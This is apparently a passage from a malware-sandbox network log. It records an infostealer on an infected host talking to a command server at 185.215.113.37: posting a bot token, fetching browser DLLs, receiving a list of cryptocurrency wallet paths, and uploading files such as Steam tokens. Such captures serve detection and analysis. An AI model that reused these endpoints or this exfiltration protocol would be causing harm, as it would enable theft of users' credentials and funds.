65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file"------HDGCFHIDAKECFHIEBFCG--
Sep 28, 2024 07:32:08.647049904 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:08.996963978 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="file"------FIIIIDGHJEBFBGDHDGII--
Sep 28, 2024 07:32:09.711899996 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:09.936177969 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:10.159491062 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 28, 2024 07:32:10.980987072 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:11.209897041 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 28, 2024 07:32:11.607800961 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:11.831916094 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 28, 2024 07:32:12.135746956 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:12.358315945 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 28, 2024 07:32:13.817819118 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:14.040512085 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 28, 2024 07:32:14.202213049 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 07:32:14.425101042 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 28, 2024 07:32:15.094434977 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 07:32:15.986721992 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:16.052898884 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="message"wallets------KJJJKFIIIJJJECAAEHDB--
Sep 28, 2024 07:32:16.463615894 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:16 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 28, 2024 07:32:16.465755939 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="message"files------GDHDAEBGCAAFIDGCGDHI--
Sep 28, 2024 07:32:16.690423965 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:16.707221031 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="file"------BGDGHJEHJJDAAAKEBGCF--
Sep 28, 2024 07:32:17.634675980 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 07:32:17.661971092 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="message"ybncbhylepme------DGHIDAFCGIEHIEBFCFBA--
